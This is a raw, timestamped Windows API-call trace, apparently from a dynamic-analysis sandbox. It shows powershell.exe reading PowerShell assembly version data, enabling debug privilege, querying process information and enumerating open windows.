	[0495.348] CoTaskMemAlloc (cb=0x44) returned 0x139860
	[0495.348] lstrcpyW (in: lpString1=0x139860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0495.348] CoTaskMemFree (pv=0x139860) 
	[0495.348] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x2bf75a8, puLen=0xadb80) returned 1
	[0495.349] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0495.349] CoTaskMemAlloc (cb=0x76) returned 0x1a0660
	[0495.349] lstrcpyW (in: lpString1=0x1a0660, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0495.349] CoTaskMemFree (pv=0x1a0660) 
	[0495.349] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x2bf7644, puLen=0xadb80) returned 1
	[0495.349] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0495.349] CoTaskMemAlloc (cb=0x44) returned 0x139860
	[0495.349] lstrcpyW (in: lpString1=0x139860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0495.349] CoTaskMemFree (pv=0x139860) 
	[0495.349] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x2bf76a8, puLen=0xadb80) returned 1
	[0495.349] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0495.349] CoTaskMemAlloc (cb=0x58) returned 0x1c5680
	[0495.349] lstrcpyW (in: lpString1=0x1c5680, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0495.349] CoTaskMemFree (pv=0x1c5680) 
	[0495.349] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x2bf7724, puLen=0xadb80) returned 1
	[0495.349] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0495.349] CoTaskMemAlloc (cb=0x20) returned 0x202280
	[0495.349] lstrcpyW (in: lpString1=0x202280, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0495.349] CoTaskMemFree (pv=0x202280) 
	[0495.350] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x2bf73cc, puLen=0xadb80) returned 1
	[0495.350] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0495.350] CoTaskMemAlloc (cb=0x66) returned 0x17c4b0
	[0495.350] lstrcpyW (in: lpString1=0x17c4b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0495.350] CoTaskMemFree (pv=0x17c4b0) 
	[0495.350] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x0, puLen=0xadb80) returned 0
	[0495.350] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x0, puLen=0xadb80) returned 0
	[0495.350] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xadb88, puLen=0xadb80 | out: lplpBuffer=0xadb88*=0x0, puLen=0xadb80) returned 0
	[0495.350] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xadb58, puLen=0xadb50 | out: lplpBuffer=0xadb58*=0x2bf7374, puLen=0xadb50) returned 1
	[0495.351] CoTaskMemAlloc (cb=0x204) returned 0x1a4dc0
	[0495.351] VerLanguageNameW (in: wLang=0x0, szLang=0x1a4dc0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0495.352] CoTaskMemFree (pv=0x1a4dc0) 
	[0495.353] VerQueryValueW (in: pBlock=0x2bf72d8, lpSubBlock="\\", lplpBuffer=0xadba8, puLen=0xadba0 | out: lplpBuffer=0xadba8*=0x2bf7300, puLen=0xadba0) returned 1
	[0495.358] GetCurrentProcessId () returned 0xefc
	[0496.148] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xacad0 | out: lpLuid=0xacad0*(LowPart=0x14, HighPart=0)) returned 1
	[0496.151] GetCurrentProcess () returned 0xffffffffffffffff
	[0496.152] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xacaf0 | out: TokenHandle=0xacaf0*=0x2e0) returned 1
	[0496.153] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2bfab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0496.155] CloseHandle (hObject=0x2e0) returned 1
	[0496.159] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xefc) returned 0x2e0
	[0496.167] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2bfabb8, cb=0x200, lpcbNeeded=0xadb08 | out: lphModule=0x2bfabb8, lpcbNeeded=0xadb08) returned 1
	[0496.170] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2bfae28, cb=0x18 | out: lpmodinfo=0x2bfae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0496.171] CoTaskMemAlloc (cb=0x804) returned 0x2099e0
	[0496.171] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x2099e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0496.171] CoTaskMemFree (pv=0x2099e0) 
	[0496.172] CoTaskMemAlloc (cb=0x804) returned 0x2099e0
	[0496.172] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x2099e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0496.172] CoTaskMemFree (pv=0x2099e0) 
	[0496.173] CloseHandle (hObject=0x2e0) returned 1
	[0496.180] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xefc) returned 0x2e0
	[0496.181] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0xadc38 | out: lpExitCode=0xadc38*=0x103) returned 1
	[0496.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bfb088, Length=0x20000, ResultLength=0xadc00 | out: SystemInformation=0x12bfb088, ResultLength=0xadc00*=0x2eca0) returned 0xc0000004
	[0496.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c1b0b8, Length=0x314a0, ResultLength=0xadc00 | out: SystemInformation=0x12c1b0b8, ResultLength=0xadc00*=0x2eca0) returned 0x0
	[0496.981] EnumWindows (lpEnumFunc=0x2a566ac, lParam=0x0) 
	[0500.470] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0501.637] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x558
	[0503.588] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0503.588] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0504.335] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0505.585] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x538
	[0505.586] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.254] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x778
	[0506.254] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x778
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x460
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.255] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1664
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x10b4
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x10ac
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x10ec
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1068
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x17e0
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x102c
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x17a4
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1050
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1694
	[0506.256] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1770
	[0506.257] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1720
	[0506.257] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x165c
	[0506.257] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1578
	[0506.257] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x16c0
	[0506.257] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x161c
	[0506.257] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1638
	[0506.257] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x15c8
	[0506.258] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1554
	[0506.258] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1674
	[0506.258] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1520
	[0506.258] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x14bc
	[0506.258] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xf8c
	[0506.258] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe9c
	[0506.258] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1434
	[0506.258] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x14ec
	[0506.258] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xfcc
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x12ac
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1484
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x934
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xc0c
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xb08
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x948
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1178
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x13e0
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xcd0
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x13fc
	[0506.259] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xdc8
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xc18
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xc2c
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xa1c
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1244
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xdb0
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1398
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1358
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1370
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1340
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x130c
	[0506.260] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x12c0
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x12e4
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1270
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1298
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x120c
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x122c
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x11c4
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x11b0
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1188
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1148
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x1160
	[0506.261] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x10fc
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe34
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xea4
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x514
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe48
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xbc8
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xdf8
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x318
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xcac
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x8bc
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xf9c
	[0506.262] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xf48
	[0506.263] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe40
	[0506.263] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xecc
	[0506.263] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xeb8
	[0506.263] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe80
	[0506.263] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe98
	[0506.263] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe60
	[0506.263] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xee4
	[0506.263] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xf00
	[0506.264] GetWindow (hWnd=0x103ee, uCmd=0x4) returned 0x0
	[0506.265] IsWindowVisible (hWnd=0x103ee) returned 0
	[0506.265] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xdf0
	[0506.265] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xe1c
	[0506.265] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xdd0
	[0506.265] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xd94
	[0506.265] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xd74
	[0506.265] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xd00
	[0506.265] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xcd8
	[0506.265] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xc84
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xca4
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xc64
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xc24
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xb84
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xbac
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x384
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xab8
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x33c
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xa44
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xa64
	[0506.266] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x8a8
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xaf0
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x88c
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xb04
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x910
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x230
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xac0
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xab4
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xaac
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x3d0
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x978
	[0506.267] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xa7c
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x59c
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xa88
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xa6c
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xa68
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x9f8
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xa04
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x924
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x8dc
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x7dc
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x768
	[0506.268] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x764
	[0506.269] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x820
	[0506.269] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x810
	[0506.269] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x794
	[0506.269] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x83c
	[0506.269] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x7ac
	[0506.269] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xb44
	[0506.269] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0xb5c
	[0506.269] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x838
	[0506.270] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xad960 | out: lpdwProcessId=0xad960) returned 0x4d0
